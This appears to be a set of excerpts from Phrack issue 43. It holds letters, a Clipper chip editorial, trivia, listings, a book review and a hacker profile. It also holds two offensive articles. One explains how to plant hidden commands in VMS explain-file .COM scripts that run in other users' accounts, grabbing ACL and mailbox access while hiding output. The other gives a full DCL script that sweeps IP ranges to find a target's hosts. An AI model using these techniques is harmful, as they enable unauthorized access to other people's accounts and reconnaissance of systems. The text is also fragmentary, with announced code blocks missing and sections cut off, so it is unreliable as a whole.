I had some beef with Rack's article in PHRACK 42. I've attached a
writeup of comments; you're welcome to a) forward it to him, b)
shitcan it, or c) publish it.
thx,
-Paul
My background: I've been into the scene for about 12 years. My day job
is writing unix s/w for a NASA contractor. My night job... well, never
mind that. I have a strong amateur interest in crypto, and I'd like to
share some of what people in the usenet/Internet community have been
kind enough to teach me.
Racketeer sez:
> If you think that the world of the Hackers is deeply shrouded with
>extreme prejudice, I bet you can't wait to talk with crypto-analysts. These
>people are traditionally the biggest bunch of holes I've ever laid eyes on. In
>their mind, people have been debating the concepts of encryption since the
>dawn of time, and if you come up with a totally new method of data encryption,
> -YOU ARE INSULTING EVERYONE WHO HAS EVER DONE ENCRYPTION-, mostly by saying
>"Oh, I just came up with this idea for an encryption which might be the best
>one yet" when people have dedicated all their lives to designing and breaking
>encryption techniques -- so what makes you think you're so fucking bright?
One real reason for this reaction is that people _have_ been studying
encryption for 100 years or so. As a result, many simple cryptosystems
are continually being reinvented by people who haven't ever made even
a simple study of cryptosystems.
You'd laugh, right? _Anyone_ can figure out how to forge mail.
Well, _anyone_ can come up with the n-th variation of the Vigniere or
substitution cipher.
An even more important reason for their 'tude is that cypherpunks are
suspicious by nature. A key principle of crypto is that you can only
trust algorithms that have been made public and thoroughly picked
over. Without that public scrutiny, how can you trust it?
The fedz' Digital Signature Standard (DSS) got raked in the crypto and
industry press because the fedz wouldn't disclose details of the
algorithm. "How do we know it's secure?" the cypherpunks asked. "We
won't use it if we don't know it's secure!"
Point being: (for those of you who skipped over) cypherpunks trust NO
ONE when the subject is encryption algorithms. Maybe J. Random Hacker
has come up with a scheme faster and more secure than, say, RSA. If
JRH won't share the details, no one will use it.
Remember that DES is mostly used for short-lived session keys. ATMs
are a good example; they typically use a DES key for one communication
session with the central bank. New session, new key. DES is _not_ very
well suited for long-term encryption, since it can probably be
attacked in "reasonable" time by a determined, well-equipped opponent.
The nice thing about PGP is that it offers IDEA and RSA in a nice
package. When you encrypt a file, PGP generates an IDEA session key,
which is then encrypted with RSA. An opponent would have to either a)
exhaustively search the entire IDEA key space or b) break RSA to
decrypt the file without the password.
Racketeer also mentions that PGP can optionally compress files before
encryption. There's a solid crypto reason behind this, too. One
well-known and successful way to attack an encrypted file is to look
for patterns of repeated characters. Since the statistical frequencies
of word and letter use in English (and many other languages; some
folks have even compiled these statistics for Pascal & C!) are
well-known, comparing the file contents with a statistical profile can
give some insight into the file's contents.
[Editor: Well, Rack is not to blame for all complaints I got about the
file. I printed a file that was several KBytes short of
complete. I noticed it seemed odd, but was assured by
Rack, TK & Presence that I had received the correct file.
I was misinformed, and should have known better than to
print a file I should have known was incomplete. I apologize
to Rack & to all of you.
*****************************************************************************
In issue #42 of Phrack there was an article about the USPS' practice of
selling change of address information without consumer consent. I sent
the supplied form letter and carbon copied my congressman and senators.
Today I received a reply from the USPS Records Office.
April 1, 1993
For disclosures made from the NCOA system, we will begin querying NCOA
licensees all of which keep logs identifying the particular subscribers to
whom they have given NCOA information. This accounting will not identify
with certainty the subscribers who have in fact received your new address,
but will give you a list of all subscribers receiving NCOA service for the
relevant time period and thus might have received your address.
Because a large number of requests like yours are being received, there
will be a delay in responding. Requests are being processed in order of
receipt and you will be sent the accountings as soon as possible. Your
patience is appreciated.
Sincerely,
Betty E. Sheriff
USPS Records Officer
[Editor: Thanks for sending that letter in! Amazing that someone
in the maze of red tape even thought to make a form letter
to respond. I think I'll demand a disclosure as well.]
****************************************************************************
Phrack 42 Errata
We mistakenly noted that the TRW video shown at HoHoCon was dubbed by
Dispater and Scott Simpson. It was actually made by Dispater and ZIBBY.
****************************************************************************
==Phrack Magazine==
EDITORIAL
by Chris Goggans
With this in mind, why should we now meet anything endorsed by the NSA
with anything but suspicion? And the fact that they refuse to release
the algorithm for security reasons even further adds to the suspicion
that this chip is either inherently weak and easily broken by the NSA
or that there is a backdoor in the algorithm that will allow the NSA
to effortlessly view any data encrypted with the Clipper.
Assuming that the government is on the level (for once), and they cannot
decipher Clipper-encrypted data without legally obtaining keys from
the assigned escrow agents. The idea that the government will have to
go before a judge and show just cause for needing the keys pacifies some,
but from my own personal experience, the government will always get
what they want. If the Secret Service could get a search warrant to
enter my home based solely upon one posting to an electronic bulletin board,
they could certainly obtain the necessary keys needed to decipher my
speech. In fact, most non-technical persons will become needlessly
suspicious upon the mere mention of someone using encrypted speech mechanisms
and be more easily swayed to release the keys to law enforcement.
Should Clipper be adopted by various government agencies for use, this could
have serious trickle-down effects upon the lives of regular citizens.
Let's say the military decides that they will use Clipper. They will then
most likely require their various contractors to use it as well. Then
after continued use, the contractor may begin to tell its other customers
to communicate with them using Clipper also. Usage could grow
exponentially as more and more people become comfortable with the use
of the secure communications devices until it becomes a defacto standard
without any legal pressures to use it ever mandated by Congress.
Should Congress mandate its use in any form, even if only within the
government itself, this potentiality will rapidly become reality.
If Clipper eventually receives such accepted use, anyone using any other
type of encryption will be immediately suspect. "Why aren't you using
the chip? What do you have to hide?" The government may even outlaw
the use of any other encryption technologies, and if America
has become comfortable and satisfied with Clipper such a law may go
unchallenged, after all, only spies, child pornographers and drug dealers
would have something to hide, right?
As the world's computer networks creep ever further into our daily lives,
and the speed and power of supercomputers multiplies every year a rather
frightening scenario emerges. Since the government is a major funder of
the Internet, who is to say that Clipper won't become the basis for
encrypting over its lines? As our country moves closer to ISDN and the
PSTN and the PSDN's become more intertwined, who is to say that Clipper
won't be the basis for encryption since companies like AT&T already
endorse it?
Perhaps my view of the government and their ultimate intentions is way off
base. I sincerely hope so, as I do not want to be forced to take the mark
of this beast to conduct my business dealings and to live my life in peace.#
==Phrack Magazine==
Volume Four, Issue Forty-Three, File 4 of 27
// // /\ // ====
// // //\\ // ====
==== // // \\/ ====
/\ // // \\ // /=== ====
//\\ // // // // \=\ ====
// \\/ \\ // // ===/ ====
******************************************************************************
PHRACK TRIVIA
The five highest scorers by the next issue (or the first 5 to get
perfect scores) win COOL STUFF!
1) CCIS
4) METAL AE password.
18) What magazine was raided for publishing black box plans?
19) What BBS raid spawned the headlines "Whiz Kids Zap Satellites" ?
20) CLASS
24) QRM
25) PSS
27) 914-725-4060
29) 8LGM
30) WOPR
32) Port 79
35) What was the author of GURPS Cyberpunk better known as?
38) NCSC
67) 516-935-2481
71) TMRC
73) 213-080-1050
74) What is the Tetragrammaton represented as?
78) PARC
82) 208057040540
83) What are the two most common processors for cellular phones?
85) What group is hoped might help the "Angels" contact RMS?
88) 26.0.0.0
98) ITS
99) (a/c)+121
Bonus 1
3 pts Name three bodies of work by Andrew Blake.
Bonus 2
3 pts Name three currently available titles with N. L. Kuzma.
Bonus 3
4 pts Why would I hate Angel Broadhurst?
*****************************************************************************
----------------------------------------------------------------
****************************************************************************
2600
Subscription Department
P.O. Box 752
Middle Island, NY 11953-0752
$21.00/Year
Animation Magazine
5889 Kanan Road, Suite 317
Agoura Hills, CA 91301
$21.00/Year
Ben Is Dead
P.O. Box 3166
Hollywood, CA 90028
$20.00/Year
Boardwatch Magazine
7586 West Jewell Ave., Suite 200
Lakewood, CO 80232
$36.00/Year
Boing Boing
11288 Ventura Blvd. #818
Studio City, CA 91604
$14.00/Year
Details
P.O. Box 50246
Boulder, CO 80321
12.00/Year
Dirt
230 Park Ave
New York, NY 10169
(Supplement to Sassy & Marvel Comics)
Electronics Now
Subscription Service
P.O. Box 51866
Boulder, CO 80321-1866
$17.97/Year
Farout
9171 Wilshire Blvd. Suite 300
Beverly Hills, CA 90210
$3.95/Issue
Fate
170 Future Way
P.O. Box 1940
Marion, OH 43305-1940
$18.00/Year
Femme Fatales
P.O. Box 270
Oak Park, IL 60303
$18.00/Year
Film Threat
Subscriptions Department
P.O. Box 16928
N. Hollywood, CA 91615-9960
$11.85/Year
Future Sex
1095 Market Street, Suite 809
San Francisco, CA 94103
$18.00/Year
Gray Areas
P.O. Box 808
Broomall, PA 19008-0808
$18.00/Year
High Times
P.O. Box 410
Mt. Morris, IL 61054
$29.95/Year
IEEE Spectrum
445 Hoes Lane
P.O. Box 1331
Piscataway, NJ 08855-1331
800-678-IEEE for info
InfoSecurity News
P.O. Box 3168
Lowell, MA 01853-3168
$40.00/Year
Magical Blend
1461 Valencia St. Dept. GA
San Francisco, CA 94110
$14.00/Year
Midnight Engineering
1700 Washington Ave.
Rocky Ford, CO 81067-9900
$19.95/Year
Mobile Office
Subscription Department
21800 Oxnard St. Suite 250
Woodland Hills, CA 91367-9644
$23.90/Year
Mondo 2000
P.O. Box 10171
Berkeley, CA 94709
$24.00/Year
Monitoring Times
P.O. Box 98
140 Dog Branch Road
Brasstown, NC 28902-0098
$19.95/Year
New Media
P.O. Box 1771
Riverton, NJ 08077-9771
$48.00/Year
The Nose
1095 Market Street, #812
San Francisco, CA 94103-9654
$15.00/Year
Popular Communications
76 North Broadway
Hicksville, NY 11801-9962
$19.95/Year
Sassy
P.O. Box 50093
Boulder, CO 80321-0093
$9.97/Year
SunExpert Magazine
1330 Beacon St.
Brookline, MA 02146-3202
$60.00/Year
Tech Connect
12407 MoPac Expwy. N. #100-374
Austin, TX 78758-2499
$12.00/Year
UFO
1536 S. Robertson Blvd.
Los Angeles, CA 90035
$21.00/Year
Wired
P.O. Box 191826
San Francisco, CA 94119-1826
$20.00/Year
*****************************************************************************
!!!!POST EVERYWHERE!!!!
"TERMINAL COMPROMISE"
by Winn Schwartau
A high tech thriller that comes from today's headlines!
Scott Mason, made his fortune selling high tech toys to the
Pentagon. Now as a New York City Times reporter, Mason under-
stands both the good and the evil of technology and discovers
pieces of the terrible plot which is designed to destroy the
economy of the United States.
From the White House to the Pentagon to the CIA to the National
Security Agency and FBI, a complex weaving of fascinating politi-
cal characters find themselves enmeshed a battle of the New World
Order. Sex, drugs, rock'n'roll: Tokyo, Vienna, Paris, Iraq,
Iran. It's all here.
FEES
Distribution for more than that - Please call and we'll figure it
out. Would you like us to coordinate a special distribution
program for you? Would you like in Postscript or other visual
formats? Give us a call and we'll see what we can do.
* * * * * * * * * *
Please DO NOT UPLOAD AND DISTRIBUTE "Terminal Compromise"
into your networks unless you intend on paying the recom-
mended fees.
* * * * * * * * * *
You have the money. :-) Please send some back by following
the same fee guidelines as those for businesses.
* * * * * * * * * *
* * * * * * * * * * *
ftp.netsys.com
/pub/novel
wuarchive.wustl.edu
/doc/misc
soda.berkeley.edu
/pub/novel
INTER.PACT PRESS
11511 Pine St. N.
Seminole, FL., 34642
Communications:
Phn: 813-393-6600
Fax: 813-393-6361
E-Mail: [email protected]
[email protected]
We will accept checks, money orders, and cash if you must, and we
mean if you must. It's not the smartest thing in the world to
send cash through the mail. We are NOT equipped at this point
for credit cards.
ISBN: 0-962-87000-5
The Publishers,
INTER.PACT Press
That is this file you are now reading and gives an overview of
"Terminal Compromise" and how NOVEL-ON-THE-NET Shareware works.
Thank You!
****************************************************************************
The study was conducted as part of our ongoing research into the
vulnerabilities of various software components of cyberspace. Our approach was
to conduct research through field interviews with a broad range of experts,
including people we characterize as "good hackers," about security issues and
vulnerabilities of cyberspace and the activities of the international
"malicious hacker" community.
While the specific results of the study are proprietary to SRI, this brief
report summarizes our general conclusions for the many individuals who kindly
participated in our field interviews. As we indicated during our field
interviews, the original research for this project was not part of any other
kind of investigation, and we have not revealed the identify of any of our
respondents.
The study aimed to understand "malicious hackers," that is, people who have and
use the technical knowledge, capability, and motivation to gain unauthorized
access, for various reasons, to systems in cyberspace. It is important to
understand that by no means all hackers are malicious nor does most hacking
involve unauthorized access to cyberspace systems; indeed, only a small
fraction of computer hacking involves such activities but gives hacking an
otherwise undeserved bad reputation. While we attempted to focus on technical
(software) vulnerabilities, our interviews led us to look more at the broader
motivations and different approaches to cracking into various networks and
networked systems.
MAIN CONCLUSIONS
o There is some evidence that the newest generations of hackers, may be more
motivated by personal gain than the traditional ethic of sheer curiosity. This
development could mean that networks and networked systems could become more
likely targets for attacks by hardened criminals or governments' intelligence
services or their contractors (i.e., employing malicious hackers). This threat
does not appear to be significant today but is a possible future scenario.
o The four major areas of vulnerability uncovered in our research have little
or nothing to do with specific software vulnerabilities per se. They relate
more to the ways in which hackers can gain critical information they need in
order to exploit vulnerabilities that exist because of poor systems
administration and maintenance, unpatched "holes" in networks and systems, and
so on.
- The susceptibility of employees of businesses, public organizations, schools,
and other institutions to "social engineering" techniques
- Lax physical and procedural controls
- The widespread availability of non-proprietary and of sensitive and
proprietary information on paper about networks and computer systems
- The existence of "moles," employees of communications and computer firms and
their suppliers who knowingly provide proprietary information to hackers.
RECOMMENDATIONS
3. Organizations and their employees should be made aware of the existence and
role of moles in facilitating and enabling hacker intrusions, and care taken in
hiring and motivating employees with the mole problem in mind.
SRI's believes that the results of this study will provide useful information
to both the operators and users of cyberspace, including the hacker community.
We are planning to continue our research in this area during 1993 within the
same framework and conditions (i.e., anonymity of all parties and
organizations) as we conducted the 1992 research. We invite hackers and others
who are interested in participating in this work through face-to-face,
telephone or email interviews should contact one of the following members of
the SRI project team:
A. J. Bate
SRI International
Phone: 415 859 2206
Fax: 415 859 3154
Email: [email protected],
[email protected]
Stuart Hauser
SRI International
Phone: 415 859 5755
Fax: 415 859 3154
Email: [email protected]
Tom Mandel
SRI International
Phone: 415 859 2365
FAX: 415 859 7544
Email: [email protected]
*****************************************************************************#
==Phrack Magazine==
/\ // // \\ // /=== ====
//\\ // // // // \=\ ====
// \\/ \\ // // ===/ ====
(cont)
******************************************************************************
`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'
'` '`
`' Approaching Reality: `'
'` ~~~~~~~~~~~~~~~~~~~~ '`
`' A review of the new book Approaching Zero `'
'` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ '`
`' by Aleph One `'
'` ~~~~~~~~~~~~ '`
`' `'
'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`
When I started to read this book, I expected to read one more of the
series of books that claim to be the "definitive history of the computer
underworld" and the "first book to define the technological subculture of
phreaking, hacking, and virus writing". After all what does a guy that
writes for GQ, The Hollywood Reporter, Variety and Time know about the
computer underground? Well to my surprise the authors, Paul Mungo and
Bryan Clough (a member of the Virus Strategy Group, which is coordinated by
New Scotland Yard's Computer Crime Unit), did a pretty good job at presenting
the facts as they are. For the first time I heard a reporter and a
computer crime expert give real figures at how much computer crime has
really cost. Other than a few minor technical errors and the fact that
they fail to mention some people and groups (especially in the virus
section), the book was enjoyable to read.
The book covers the history of the underground starting with its
beginnings in the 60's, from phreaking to the adventures of Captain
Crunch and the rest of the bunch to the not so long ago Operation Sundevil
and the raids all over the country on members of the LOD, MOD and DPAC.
It also goes through the events that led to the German hackers spy trials,
and to the new generation of virus writers that are creating the new kind
of living organisms that roam cyberspace. They also discuss the gray
scale that categorizes hackers, from the good hackers to the bad to the
ones not that bad... those who are in it for profit and those who are
in it to learn. Hopefully all the readers of the book, hackers, security
specialists, reporters and the general public will get a better
understanding of what motivates hackers to do what they do by learning
where they come from. To the hackers let them learn not to repeat their
past errors.
I hope that the time of raids and sting operations has passed, but
the late developments in the Washington 2600 meeting have pulled a shadow
over my hopes. Has no one learned? Have the SS and FBI nothing better to
do? Just a few moths back someone pulled one of the greatest scams of all
by setting up a fake ATM and stealing a few thousand dollars. These are
the kind of people the authorities should be after. And to the hacker,
don't sell yourself! Remember this is a learning trip, once you start
forgetting to learn and start making money out of it, it is just another
job, an illegal one at that.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
What fallows is a list of books, papers and articles for those that
want to know a little more of how the media portrays us, and a little more
about the story of hacking in general.
Books:
~~~~~~
- "The Casino Virus - Gambling with Your Hard Disk" by Jim Bates.
Virus Bulletin, March 1991: 15-17.
- "Data Exchange and How to Cope with This Problem: The Implication
of the German KGB Computer Espionage Affair" by Hans Gliss. Paper
presented at Securicom Italia, October 1989.
- "Surfing Off the Edge" by Richard Begar. Time, February 8, 1993: 62.
- "Off the Hook" by Julian Dibbell. Village Voice, August 21, 1990: 8.
- "On Line and Out of Bounds" by Julian Dibbell. Village Voice, July
24, 1990:27-32.
- "A nationwide Computer-Fraud Ring Is Broken Up." The New York Times
National, Sunday, April 19, 1992.
- "Morris Code: by Katie Hafner. The New Republican, February 19, 1990:
15-16.
- "Plan to outlaw hacking." Nature, Vol. 341, October 19, 1989: 559.
*****************************************************************************
{----------------------------------------------}
{ }
{ VMS/VAX Explain Files Explained }
{ or }
{ Security Holes in the VAX and DCL }
{ }
{ By: The Arctic Knight }
{ }
{----------------------------------------------}
VAX/VMS hacking has declined in popularity over the years due to the
abundance of UNIX machines now available. It has even gotten bad press from
fellow hackers. Included in this file is a security hole the size of , oh,
any of the older IBM mainframes. With a little curiosity, persistence, and
down right stubbornness I came across this rather obvious hole in the system.
However, this hole may be so obvious that it has remained relatively hidden
until now, especially since the decline of DCL users.
On most VAX systems, there is something called explain files. These are
usually help files that are made up by the system operators or borrowed from
somewhere to help better explain the way certain features of the system work,
whether they be general VAX commands, or system-specific programs.
When you are in your account (Presumably, a fake one, as this can be
tracked down if you are foolish) type:
$ explain index
and you will get a list of all the explain files on your system. Go ahead
and take a look around these just to get a feel of what it looks like. It
should be a menu driven list of text files to view or programs to run(!!!).
Most system operators only set this up to show various text files
describing commands like mentioned above. However, DCL .com files can be run
from explain files as well. Now comes the fun. Many systems will also allow
users to set up there own explain file. A really nice way to make it easy for
other users to view text files or run programs that you have set for group or
world access.
The first thing someone needs to do is make a file called INTRO.LKT which
will contain whatever introduction text that you would like displayed before
your explain file menu is displayed(i.e. you might have a description of
yourself, your duties, or a funny poem, or WHATEVER YOU WANT THAT CAN BE
CONTAINED IN A TEXT FILE!!!!)
You can use any editor to do this like EDT(a line editor) or TPU(a full
screen editor). You will need to type something along these lines to create the
file:
After you are finished typing in the file, if you used TPU (A much better
choice than EDT), you press <CONTROL-Z> to save the file. Now you must create
a file called INDEX.LKI which will contain the file directories, filenames,
and short descriptions of the files that you want to have displayed. You do
this in the same manner as above, by entering an editor, and creating the file.
$edit/tpu index.lki
Now, in this file the lines should look like the following:
(File Directory) (Filename) (File Description)
Now, to explain these three lines. The first one will look for the program
in your main directory. The second line will look for the program listed after
it on the device called USER and in the HACK directory within the AKNIGHT
directory. The final line will look on the device called TEMP$1 in the FTP
directory within the AKNIGHT directory. Adding DCL programs will be explained
in a minute, but first lets get this up and running.
Now, that you have typed in the text files you want, and saved this file
you need to set the protection on your main directory and any others that need
accessing like the text files to group and world access. For the above example
one would want to type(assuming you are in your main directory):
$set prot=(g:re,w:re) user:[000000]aknight.dir !This is my main directory
$set prot=(g:re,w:re) user:[aknight.hack]
$set prot=(g:re,w:re) temp$1:[000000]aknight.dir !My second storage device
$set prot=(g:re,w:re) temp$1:[aknight.ftp]
$set prot=(g:r,w:r) phrack41.txt !Giving privs to read only
$set prot=(g:r,w:r) user:[aknight.hack]vms.txt
$set prot=(g:r,w:r) temp$1:[aknight.ftp]ftplist.txt
You should get a print out to screen of your INTRO.LKT file and then a
message along the lines of "Hit <return> to continue". When you hit return a
menu will appear very similar to the normal explain file menu except with your
files listed and their descriptions which were accessed by the computer from
your INDEX.LKI file. It would look like this(or something similar) in the above
example.
EXPLAIN AKNIGHT
================================================================================
(A) PHRACK41 T-A complete copy of Phrack 41 for your enjoyment.
(B) VMS T-A guide to hacking VMS systems.
(C) *EXPLAIN/USER AKNIGHT FTPLIST
T-A list of FTP servers in-state.
(Q) TERMINATE THIS PROGRAM
================================================================================
T = Text Display P = Program to be run
(* = Related Information)
Choose A-C, Q, oe type HELP for assistance.
Now you have an explain file. Pressing A-C will print those files to
screen with pauses at each page if set up on your system/account to do so. I
typed out number C the way I did, because when it has to access a directory
other than it's main one, it will usually do this. I think there is away around
this, but to be quite honest I haven't bothered figuring it out yet. When you
quit, you will be dropped back off at your main prompt. The reason you need to
set your protections, is because even thought from your account, it may look
like it is working, if you don't set your protections as described above,
NO ONE else will be able to view it!!
Now, comes the fun part. Putting DCL .COM files into your explain file.
These are put into your index just like any text file. So you could type up a
program to let someone copy the public files you have in your account to their
directory, or something similar. The security flaw comes in here and it is
a big one. Since a user is accessing your explain file from their account, any
file that they run, issues commands in their account. So, one might plant a
line in the middle of the above program that say something like:
Here is another idea. Say you create a text reader in DCL, to allow people
to jump around in the text files you have, skip pages, etc. called TYPE.COM in
your main directory. Anytime you can fool people into thinking that the
computer is taking a little time to think, you can insert some major commands,
i.e. when it is skipping pages, or coping files, which almost takes no time at
all in reality. I STRONGLY suggest starting any program you plan to nest
commands like this into with:
$set noverify
Which will make sure that the program lines don't get printed to the
screen as they are running. Another important command to know is the following
which will cause the next text output from the VAX to be sent to a NULL device,
so it will essentially be lost and not printed to the screen. So, if one is
accessing someone's mailbox, you don't want a messaging appearing on screen
saying that you have entered VAX/VMS mail or whatever. The command is:
$assign nl:sys$output/user
If you forget the /user it will send the output to the null device for the
session, instead of just one line.
Some other things one might do would be to add yourself to someone's
ACL(access control list) by typing:
Now, this will give you access to all their files just as if you were the
user, however if they bother to ever do a dir/prot command your username will
be printed all over the screen, so one would suggest if you must do this, to
use a fake account. Same with this below command:
$assign nl:sys$output/user
$mail set write aknight
The second line will give me read and write access to someone's mailbox,
but once again if they bother to check their mailbox protections your username
will be displayed.
In case, you haven't realized this yet, this all has A LOT of potential,
and what I have mentioned here is just the tip of the iceberg and really mostly
small and even foolish things to do, but the fact comes down to ANYTHING the
user can do in their account, YOU can do in there account if you know the right
commands and have the patience to nest them into a .COM file well enough.
When you have created the .COM file and added it to the INDEX.LKI file,
then you will need to set the protection of the file like so:
You now have it a fully functional explain file that is only held down by
your imagination.
*****************************************************************************
A Internet Scanner
(War Dialer)
by
MadHatter
Remember those scanner, war dialer programs everyone used to scan areas of
telephone numbers to find unknown hosts? Well, now your on the net and you're
targeting some certain establishment, and you know which part of the net they
own, but the hell if you know what the actual IP addresses of their hosts are...
Telneting to NIC.DDN.MIL is no help, their records are a year old... Might as
well have been 10 yrs ago... So you type every possible IP address in. Right?
After a while that shit gets tiring... Well, hell let the computer do it,
that's what its there for. More speed, no sore fingers, no bitching, and it
runs when you're not there. Almost perfect.....
Program Details
~~~~~~~~~~~~~~~
DCL is the language and it runs on Vaxen. A,B,C,D respectively represent
the starting IP address. E,F,G,H respectively represent the ending IP address
(ex. If you what to start at 4.1.1.1 and end at 6.1.1.1 then a = 4, B = 1,
etc., E = 6, F = 1, etc.)
The prog creates a data file (FINAL.DAT) that holds all successful
connections. If you run it in batch, it also creates a .log file. This by
far takes up most of the memory. When the program quits, delete it.
This prog is just one big loop. It finds a good telnet address and then
reIFINGERs there, saving it.
Program Changes
~~~~~~~~~~~~~~~
If you run it in batch, then you might (probably) have to define where
the IFINGER or FINGER program is. Make sure it is the one for FINGERing remote
hosts, the commands for it vary. Why do you have to define it? Because the
dumb-ass sysop couldn't think of why anyone would want to use it in batch.
Problems
~~~~~~~~
The IFINGER (FINGER) command might not connect to some hosts from your
system. Why can you TELNET there but no IFINGER? It all probably has to do
with the other host (it has tight security, too far away, doesn't support
FINGERing, etc.).
More Ideas
~~~~~~~~~~
If you want the net area of an establishment then ftp to NIC.DDN.MIL and
get the hosts listing, or TELNET there and search for the name.
Some areas of the net do not like to be scanned. Your sysop will get nasty
calls, and then you will get nasty e-mail if you for instance scan the Army
Information Systems Center. Or any other government org. Of course, this
program wouldn't hurt them at all, it would bounce back. They use firewalls.
But they will bitch anyway.
After you run this program for awhile, you'll notice the net is really
a big empty place. Hosts are few and far between (at least address wise).
Are you agoraphobic yet? What do you do with all this room?
MadHatter
*----------------------------CUT HERE------------------------------------------*
$ A = 0
$ B = 0
$ C = 0
$ D = 0
$ E = 257
$ F = 0
$ G = 0
$ H = 0
$ D = D - 1
$ IFINGER := $VMS$UTIL:[IFINGER]FINGER.EXE;1
$ CREATE FINAL.DAT
$ LOOP1:
$ ON SEVERE_ERROR THEN GOTO SKIP
$ D = D + 1
$ IFINGER @'A'.'B'.'C'.'D'
$ ON SEVERE_ERROR THEN GOTO SKIP
$ ASSIGN TEMPFILE.DAT SYS$OUTPUT
$ WRITE SYS$OUTPUT "["'A'"."'B'"."'C'"."'D'"]"
$ IFINGER @'A'.'B'.'C'.'D'
$ DEASSIGN SYS$OUTPUT
$ APPEND TEMPFILE.DAT FINAL.DAT
$ DELETE TEMPFILE.DAT;*
$ SKIP:
$ IF A .EQ. E THEN IF B .EQ. F THEN IF C .EQ. G THEN IF D .EQ. H THEN EXIT
$ IF D .EQ. 256 THEN GOTO LOOP2
$ IF C .EQ. 256 THEN GOTO LOOP3
$ IF B .EQ. 256 THEN GOTO LOOP4
$ GOTO LOOP1
$ LOOP2:
$ D = 0
$ C = C + 1
$ GOTO LOOP1
$ LOOP3:
$ C = 0
$ B = B + 1
$ GOTO LOOP1
$ LOOP4:
$ B = 0
$ A = A + 1
$ GOTO LOOP1
$ EXIT
*------------------------------------CUT HERE----------------------------------*
*****************************************************************************
Caller Identification
by (Loq)ue & Key
3/20/93
Next are the "Message Type Word", and the "Message Length Word".
The MTW contains a Hex $04 for CID applications, with several other
codes being planned, for example $0A to mean message waiting for
a pager. The MLW contains the binary equivalent of the number of
digits in the calling number.
The data words come next, in ASCII, with the least significant
digit first. It is padded in from with a binary 0, and followed by
a binary 1. A checksum word comes after that, which contains the
twos-complement sum of the MLW and data words.
The checksum word usually signals the end of the message from
the CO, however, other messages for equipment to decode can occur
afterwards.
*****************************************************************************
-----------------------------
The CSUNet X.25 Network
Overview by Belgorath
-----------------------------
C y b e r C o r p s
Calstate University, along with Humboldt State, runs a small X.25 network
interconnecting its campuses. This file will attempt to give an overview of
this network. The hosts on this network are connected via 9600-baud links. The
main PAD on this network is a PCI/01 that allows the user to connect to several
hosts. Among them are:
(At the time of this writing, several of the machines were unreachable. They
are marked with "No info available")
caps - CSUNet networking machine. From it, you can connecting to most
PAD hosts plus a few more. The extras are:
access - Connect to eis.calstate.edu (login as "access")
core - Connect to eis.calstate.edu (login as "core")
ctp - Connect to eis.calstate.edu (login as "ctp")
eis - Connect to eis.calstate.edu (login as "eis")
trie - Connect to eis.calstate.edu (login as "trie")
csupernet - CSUPERNet appears to be a public-access UNIX.
login as "public" for ATI-Net.
login as "super" for academic information.
login as "atls" for the ATLS system
Once you apply for an account here, you can telnet
to caticsuf.cati.csufresno.edu to use it.
This is all well and good, but how to you access CSUNet? It can be reached
via Internet, using the Humbolt PACX (pacx.humboldt.edu). The Humboldt PACX
allows several services, among them are:
That's really all there is to say concerning the network structure (well,
I could go through and list all their X.25 addresses, but I won't). There's a
ton more to be said about using this network, but its little quirks and
surprises can be left to you to figure out. What I can do here is give a few
hints on using CDCNet and the PAD.
Using CDCNet
~~~~~~~~~~~~
When a CDC Cyber says "You may now execute CDCNet Commands", this is your
cue. You have the following commands available:
activate_auto_recognition
activate_x_personal_computer
change_connection_attribute
change_terminal_attribute
change_working_connection
create_connection
delete_connection
display_command_information
display_command_list
display_connection
display_connection_attribute
display_service
display_terminal_attribute
do
help
request_network_operator
*******************************************************************************
# ==Phrack Magazine==
This issue our prophile features a hacker who has been around forever,
who's been there and done that, literally. His handle is Dr. Who.
When almost everyone was still mystified by Telenet, Dr. Who was busily
exploring Europe's PSN's like PSS and Datex-P. When the Internet was in
its infancy, Dr. Who was there with an account on BBN. When the world
was short of NUI's, Dr. Who discovered and perfected Pad-To-Pad. When
the world still thought COSMOS was the end-all-be-all, Dr. Who was
lurking on 1A's. One of the early LODers and one of the longest lasting.
And to top it all off, a close personal friend. How elite can you get?
______________________________________________________________________________
Personal Info:
From the TV show, of course - I had a hard time defending it from other
people, so would sometimes add (413), my home area code, to identify
which one I was. Skinny Puppy was from the band of course,
and Saint Cloud was from the location of a system I was playing with,
in France.
What am I?
The worst day of my life - 3/11/86 - getting busted, and not knowing
what for. My parents called up my high-school and left a message for
me to call home immediately. When I did, they informed me that the
Secret Service and TRW (Hi Mr. Braum) had been in our house and removed
everything. A nosy neighbor saw the whole incident, and within days our
entire town knew about the raid.
Some three and a half years later they pressed charges. So much for
due process and right to a speedy trial.
Good days:
5-91 - Being all fucked up in NYC with my girlfriend and Bill from RNOC;
10/9/84 - My first TAP meeting. Expecting to meet Mark Tabas but
meeting his father instead. Tabas had run away from home, and his
parents found some notes indicating that he might turn up in New York
at Eddie's for the TAP meeting. Tabas' dad hopped on a plane to NYC,
rented a car and staked out the meeting. Everyone inside, already
convinced that they were under surveillance, became very aware that
they were being watched by some guy in a suit and a rental car.
Eventually, he came inside and asked if anyone knew where Tabas was.
We said "Who wants to know?" To which he gave out his business card
letting us know he was Tabas' dad and just worried. Tabas was not
even in New York.
The whole summer of 1985 - staying at home, hacking and loving being
a computer geek. Four days straight on an Alliance Teleconference once,
being woken up each morning by blasts of touch-tone!
KP+914-042-1050+ST
Discovering Pad-to-Pad.
McD: Becoming an XRAY Technician. (Dr. Bubbnet)
MSK ../tdas
NET-LINE-20245614140000.
Wallpapering my room with Sprint Foncard printouts
My favorite BBS of all time was Farmers of Doom. Also memorable were
The Legion of Doom, Osuny, WOPR, Black Ice, and lots more.
My favorite boards were the ones where there was a lot of activity, and
a lot of trust between the users. While a board that doesn't crash
all the time is important, an expensive computer does not a good
board create.
There are a lot of people who I would like to mention that have helped
me greatly and who I have known for a very long time:
Tuc - Well, he's just Tuc. What else can you say?
Karl Marx - Only person I know with his own dictionary entry.
Next: the social register.
Mr. Bigchip - Who is that? (I'm sure you are all asking)
Terminal Man - So long and thanks for all the codes. (This man
knew The Condor?)
One I would like single out is Erik Bloodaxe, who I have known over the
phone for 9 years now, but will meet for the first time at this year's
Summercon, if I get there. [Ed: He didn't make it]
